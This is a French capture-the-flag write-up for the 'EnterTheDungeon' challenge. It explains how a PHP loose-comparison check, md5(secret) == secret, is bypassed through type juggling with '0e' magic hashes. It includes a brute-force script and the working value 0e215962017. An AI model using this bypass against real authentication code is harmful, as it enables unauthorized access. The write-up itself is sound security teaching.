# EnterTheDungeon (25 points)

**Challenge**

On vous demande simplement de trouver le flag.

URL : http://challenges2.france-cybersecurity-challenge.fr:5002/


**Solution**

On se connecte sur le site en question :

![dungeon1](dungeon1.png)

Le plus important, c'est la source :

![dungeon2](dungeon2.png)

Le commentaire est assez explicite, allons voir le fichier texte dont il est question :

```php
[...]
	// authentication is replaced by an impossible test
	//if(md5($_GET['secret']) == "a5de2c87ba651432365a5efd928ee8f2")
	if(md5($_GET['secret']) == $_GET['secret'])
	{
		$_SESSION['dungeon_master'] = 1;
		echo "Secret is correct, welcome Master ! You can now enter the dungeon";
	}
[...]
```

Le développeur prétend que le test est impossible, mais c'est sans compter sur les joyeusetés de PHP, et en particulier du fait de la comparaison non typée de l'opérateur `==` et du [type juggling qui a fait parler de lui notamment sur l'authentification](http://phpsadness.com/sad/47).

On sait que PHP, s'il le peut, va convertir les valeurs comparées vers des flottants. L'égalité de deux flottants différents est relativement facile à obtenir avec deux valeurs relativement proches de 0. Le plan est donc de trouver une valeur de `secret` qui commence, comme son md5, par `0e` et dont les valeurs en flottant sont considérées comme égales par PHP. On bricole un petit brute-force :

```php
<?php
$i = 0;
while (true) {
	$secret = "0e$i";
	if(md5($secret) == $secret) {
		echo("Found : $secret\n");
		exit(0);
	}
	$i++;
}
?>
```

Il nous faut une minute pour obtenir la valeur `0e215962017`. Voyons si cela fonctionne :

![dungeon3](dungeon3.png)
